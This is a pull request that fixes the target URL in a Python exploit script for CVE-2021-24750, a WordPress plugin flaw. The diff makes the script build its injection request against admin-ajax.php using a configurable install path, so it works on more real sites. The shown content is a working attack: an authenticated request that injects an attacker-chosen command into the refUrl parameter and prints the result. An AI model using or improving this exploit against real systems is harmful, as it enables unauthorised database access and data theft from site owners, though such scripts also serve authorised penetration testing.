### PR TITLE
Fixed CVE-2021-24750 exploit URL

### DIFF
--- a/Wordpress/CVE-2021-24750/exploit.py
+++ b/Wordpress/CVE-2021-24750/exploit.py
@@ -80,7 +80,7 @@ body = {
 auth = session.post(auth_url, headers=header, data=body)
 
 # Exploit:
-exploit_url = 'http://' + target_ip + ':' + target_port + '/wordpress/wp-admin/admin-ajax.php?action=refDetails&requests={"refUrl":"' + "' " + command + '"}'
+exploit_url = 'http://' + target_ip + ':' + target_port + wp_path +'wp-admin/admin-ajax.php?action=refDetails&requests={"refUrl":"' + "' " + command + '"}'
 exploit = session.get(exploit_url)
 print(exploit.text)
 print('Exploit finished at: ' + str(datetime.now().strftime('%H:%M:%S')))


### PR DESCRIPTION
There is a small mistake in the exploit URL. Instead of using the `wp_path` variable, the WordPress path is hardcoded as `/wordpress/`. As a result, the script don't work if the WordPress website isn't at `http://IP:PORT/wordpress`.